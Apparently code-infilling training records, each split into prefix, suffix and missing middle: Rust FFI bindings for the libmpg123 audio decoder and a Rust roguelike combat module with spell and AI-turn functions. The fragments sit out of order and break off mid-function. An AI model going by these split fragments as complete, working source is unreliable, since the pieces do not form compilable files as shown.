pub fn mpg123_open_fd(handle: *mut Mpg123Handle, fd: c_int) -> c_int;
pub fn mpg123_open_handle(handle: *mut Mpg123Handle, iohandle: *mut c_void) -> c_int;
pub fn mpg123_open_feed(handle: *mut Mpg123Handle) -> c_int;
pub fn mpg123_close(handle: *mut Mpg123Handle) -> c_int;
pub fn mpg123_read(handle: *mut Mpg123Handle, outmem: *mut u8, memsize: size_t, done: *mut size_t) -> c_int;
pub fn mpg123_feed(handle: *mut Mpg123Handle, mem: *const u8, size: size_t) -> c_int;
pub fn mpg123_decode(handle: *mut Mpg123Handle, inmem: *const u8, insize: size_t, outmem: *mut u8, outsize: *mut size_t) -> c_int;
pub fn mpg123_decode_frame(handle: *mut Mpg123Handle, num: *mut off_t, audio: *mut *const u8, bytes: *mut size_t) -> c_int;
pub fn mpg123_framebyframe_decode(handle: *mut Mpg123Handle, num: *mut off_t, audio: *mut *const u8, bytes: *mut size_t) -> c_int;
pub fn mpg123_framebyframe_next(handle: *mut Mpg123Handle) -> c_int;
pub fn mpg123_framedata(handle: *mut Mpg123Handle, header: *mut c_ulong, bodydata: *mut *mut u8, bodybytes: *mut size_t) -> c_int;
pub fn mpg123_framepos(handle: *mut Mpg123Handle) -> off_t;
// Position and seeking
pub fn mpg123_tell(handle: *mut Mpg123Handle) -> off_t;
pub fn mpg123_tellframe(handle: *mut Mpg123Handle) -> off_t;
pub fn mpg123_tell_stream(handle: *mut Mpg123Handle) -> off_t;
pub fn mpg123_seek(handle: *mut Mpg123Handle, sampleoff: off_t, whence: c_int) -> off_t;
pub fn mpg123_feedseek(handle: *mut Mpg123Handle, sampleoff: off_t, whence: c_int, input_offset: *mut off_t) -> off_t;
pub fn mpg123_seek_frame(handle: *mut Mpg123Handle, frameoff: off_t, whence: c_int) -> off_t;
pub fn mpg123_timeframe(handle: *mut Mpg123Handle, sec: c_double) -> off_t;
pub fn mpg123_index(handle: *mut Mpg123Handle, offsets: *mut *const off_t, step: *mut off_t, fill: *mut size_t) -> c_int;
pub fn mpg123_set_index(handle: *mut Mpg123Handle, offsets: *mut off_t, step: off_t, fill: size_t) -> c_int;
// We leave off mpg123_position because it's not stable
// Also everything after mpg123_eq
}
pub enum Mpg123Handle {}
enum_from_primitive!{
#[repr(C)]
pub enum Mpg123Param {
Verbose,
Flags,
AddFlags,
ForceRate,
DownSample,
Rva,
Downspeed,
Upspeed,
StartFrame,
DecodeFrames,
IcyInternal,
Outscale,
Timeout,
RemoveFlags,
ResyncLimit,
IndexSize,
Preframes,
Feedpool,
Feedbuffer,
}
}
// Enum conversion:
// sed -Ee 's@^\s*,?MPG123_([^, ]*),?(\s*=\s*[-x0-9a-fA-F]+)?\s*/\*\*<[ 01]*(.*?)\s*\*/@/// \3\n\1\2,@' |sed -e 's/^/ /' -e 's/\s*$//'
// Bitflags conversion:
// sed -Ee 's@^\s*,?MPG123_([^ ]*)\s*=\s*(0x[0-9a-fA-F]+)\s*/\*\*<[ 01]*(.*?)\s*\*/@/// \3\nconst \1 = \2;@' |sed -e 's/^/ /'
bitflags!{
// Contents generated using
// sed -Ee 's@^\s*,?MPG123_([^ ]*)\s*=\s*(0x[0-9a-fA-F]+)\s*/\*\*<[ 01]*(.*?)\s*\*/@/// \3\nconst \1 = \2;@' |sed -e 's/^/ /'
pub flags Mpg123ParamFlags: c_ulong {
/// Force some mono mode: This is a test bitmask for seeing if
/// any mono forcing is active.
const FLAG_FORCE_MONO = 0x7,
/// Force playback of left channel only.
const FLAG_MONO_LEFT = 0x1,
/// Force playback of right channel only.
const FLAG_MONO_RIGHT = 0x2,
/// Force playback of mixed mono.
const FLAG_MONO_MIX = 0x4,
/// Force stereo output.
const FLAG_FORCE_STEREO = 0x8,
/// Force 8bit formats.
const FLAG_FORCE_8BIT = 0x10,
/// Suppress any printouts (overrules verbose).
const FLAG_QUIET = 0x20,
/// Enable gapless decoding (default on if libmpg123 has
/// support).
const FLAG_GAPLESS = 0x40,
/// Disable resync stream after error.
const FLAG_NO_RESYNC = 0x80,
/// Enable small buffer on non-seekable streams to allow some
/// peek-ahead (for better MPEG sync).
const FLAG_SEEKBUFFER = 0x100,
/// Enable fuzzy seeks (guessing byte offsets or using
/// approximate seek points from Xing TOC)
const FLAG_FUZZY = 0x200,
/// Force floating point output (32 or 64 bits depends on
/// mpg123 internal precision).
const FLAG_FORCE_FLOAT = 0x400,
/// Do not translate ID3 text data to UTF-8. ID3 strings will
/// contain the raw text data, with the first byte containing
/// the ID3 encoding code.
const FLAG_PLAIN_ID3TEXT = 0x800,
/// Ignore any stream length information contained in the
/// stream, which can be contained in a 'TLEN' frame of an
/// ID3v2 tag or a Xing tag
const FLAG_IGNORE_STREAMLENGTH = 0x1000,
/// Do not parse ID3v2 tags, just skip them.
const
|
pub fn mpg123_strerror(handle: *mut Mpg123Handle) -> *const c_char;
pub fn mpg123_errcode(handle: *mut Mpg123Handle) -> Mpg123Error;
|
random_line_split
|
|
combat.rs
|
.
pub fn target_tile(tcod: &mut Tcod,
objects: &[Object], game: &mut Game,
max_range: Option<f32>)
-> Option<(i32, i32)> {
use tcod::input::KeyCode::Escape;
loop {
// render the screen. this erases the inventory and shows the names of
// objects under the mouse.
tcod.root.flush();
let event = input::check_for_event(input::KEY_PRESS | input::MOUSE).map(|e| e.1);
let mut key = None;
match event {
Some(Event::Mouse(m)) => tcod.mouse = m,
Some(Event::Key(k)) => key = Some(k),
None => {}
}
render_all(tcod, objects, game, false);
let (x, y) = (tcod.mouse.cx as i32, tcod.mouse.cy as i32);
// accept the target if the player clicked in FOV, and in case a range
// is specified, if it's in that range
let in_fov = (x < MAP_WIDTH) && (y < MAP_HEIGHT) && tcod.fov.is_in_fov(x, y);
let in_range = max_range.map_or(
true, |range| objects[PLAYER].distance(x, y) <= range);
if tcod.mouse.lbutton_pressed && in_fov && in_range {
return Some((x, y))
}
let escape = key.map_or(false, |k| k.code == Escape);
if tcod.mouse.rbutton_pressed || escape {
return None // cancel if the player right-clicked or pressed Escape
}
}
}
/// find closest enemy, up to a maximum range, and in the player's FOV
pub fn closest_monster(max_range: i32, objects: &mut [Object], tcod: &Tcod) -> Option<usize> {
let mut closest_enemy = None;
let mut closest_dist = (max_range + 1) as f32; // start with (slightly more than) maximum range
for (id, object) in objects.iter().enumerate() {
if (id != PLAYER) && object.fighter.is_some() && object.ai.is_some() &&
tcod.fov.is_in_fov(object.x, object.y)
{
// calculate distance between this object and the player
let dist = objects[PLAYER].distance_to(object);
if dist < closest_dist { // it's closer, so remember it
closest_enemy = Some(id);
closest_dist = dist;
}
}
}
closest_enemy
}
pub fn cast_fireball(_inventory_id: usize, objects: &mut [Object],game: &mut Game, tcod: &mut Tcod)
-> UseResult
{
// ask the player for a target tile to throw a fireball at
game.log.add("Left-click a target tile for the fireball, or right-click to cancel.",
colors::LIGHT_CYAN);
let (x, y) = match target_tile(tcod, objects, game, None) {
Some(tile_pos) => tile_pos,
None => return UseResult::Cancelled,
};
game.log.add(format!("The fireball explodes, burning everything within {} tiles!", FIREBALL_RADIUS),
colors::ORANGE);
let mut xp_to_gain = 0;
for (id, obj) in objects.iter_mut().enumerate() {
if obj.distance(x, y) <= FIREBALL_RADIUS as f32 && obj.fighter.is_some() {
game.log.add(format!("The {} gets burned for {} hit points.", obj.name, FIREBALL_DAMAGE),
colors::ORANGE);
if let Some(xp) = obj.take_damage(FIREBALL_DAMAGE, game) {
// Don't reward the player for burning themself!
if id != PLAYER {
xp_to_gain += xp;
}
}
}
}
objects[PLAYER].fighter.as_mut().unwrap().xp += xp_to_gain;
UseResult::UsedUp
}
pub fn cast_heal(_inventory_id: usize, objects: &mut [Object], game: &mut Game, _tcod: &mut Tcod)
-> UseResult
{
// heal the player
let player = &mut objects[PLAYER];
if let Some(fighter) = player.fighter {
if fighter.hp == player.max_hp(game) {
game.log.add("You are already at full health.", colors::RED);
return UseResult::Cancelled;
}
game.log.add("Your wounds start to feel better!", colors::LIGHT_VIOLET);
player.heal(HEAL_AMOUNT, game);
return UseResult::UsedUp;
}
UseResult::Cancelled
}
pub fn cast_lightning(_inventory_id: usize, objects: &mut [Object], game: &mut Game, tcod: &mut Tcod) -> UseResult
{
// find closest enemy (inside a maximum range) and damage it
let monster_id = closest_monster(LIGHTNING_RANGE, objects, tcod);
if let Some(monster_id) = monster_id {
// zap it!
game.log.add(format!("A lightning bolt strikes the {} with a loud thunder! \
The damage is {} hit points.",
objects[monster_id].name, LIGHTNING_DAMAGE),
colors::LIGHT_BLUE);
objects[monster_id].take_damage(LIGHTNING_DAMAGE, game);
UseResult::UsedUp
} else { // no enemy found within maximum range
game.log.add("No enemy is close enough to strike.", colors::RED);
UseResult::Cancelled
}
}
pub fn cast_confuse(_inventory_id: usize, objects: &mut [Object], game: &mut Game,tcod: &mut Tcod)
-> UseResult
{
// ask the player for a target to confuse
game.log.add("Left-click an enemy to confuse it, or right-click to cancel.", colors::LIGHT_CYAN);
let monster_id = target_monster(tcod, objects, game, Some(CONFUSE_RANGE as f32));
if let Some(monster_id) = monster_id {
let old_ai = objects[monster_id].ai.take().unwrap_or(Ai::Basic);
// replace the monster's AI with a "confused" one; after
// some turns it will restore the old AI
|
game.log.add(format!("The eyes of {} look vacant, as he starts to stumble around!",
objects[monster_id].name),
colors::LIGHT_GREEN);
UseResult::UsedUp
} else { // no enemy fonud within maximum range
game.log.add("No enemy is close enough to strike.", colors::RED);
UseResult::Cancelled
}
}
pub fn player_death(player: &mut Object, messages: &mut Messages) {
// the game ended!
// TODO Replace with game.log.add()
message(messages, "You died!", colors::DARK_RED);
// for added effect, transform the player into a corpse!
player.char = CORPSE;
player.color = colors::DARK_RED;
}
pub fn monster_death(monster: &mut Object, messages: &mut Messages) {
// transform it into a nasty corpse! it doesn't block, can't be
// attacked and doesn't move
// TODO Replace with game.log.add()
// message(messages, format!("{} is dead!", monster.name), colors::ORANGE);
message(messages, format!("{} is dead! You gain {} experience points.",
monster.name, monster.fighter.unwrap().xp), colors::ORANGE);
monster.char = CORPSE;
monster.color = colors::DARK_RED;
monster.blocks = false;
monster.fighter = None;
monster.ai = None;
monster.name = format!("remains of {}", monster.name);
}
pub fn player_move_or_attack(dx: i32, dy: i32, objects: &mut [Object], game: &mut Game) {
// the coordinates the player is moving to/attacking
let x = objects[PLAYER].x + dx;
let y = objects[PLAYER].y + dy;
// try to find an attackable object there
let target_id = objects.iter().position(|object| {
object.fighter.is_some() && object.pos() == (x, y)
});
// attack if target found, move otherwise
match target_id {
Some(target_id) => {
let (player, target) = mut_two(PLAYER, target_id, objects);
player.attack(target, game);
}
None => {
move_by(PLAYER, dx, dy, &mut game.map, objects);
}
}
}
pub fn ai_take_turn(monster_id: usize, objects: &mut [Object], game: &mut Game, fov_map: &FovMap) {
use Ai::*;
if let Some(ai) = objects[monster_id].ai.take() {
let new_ai = match ai {
Basic => ai_basic(monster_id, game, objects, fov_map),
Confused{previous_ai, num_turns} => ai_confused(
monster_id, &mut game.map, objects, &mut game.log, previous_ai, num_turns)
};
objects[monster_id].ai =
|
objects[monster_id].ai = Some(Ai::Confused {
previous_ai: Box::new(old_ai),
num_turns: CONFUSE_NUM_TURNS,
});
|
random_line_split
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.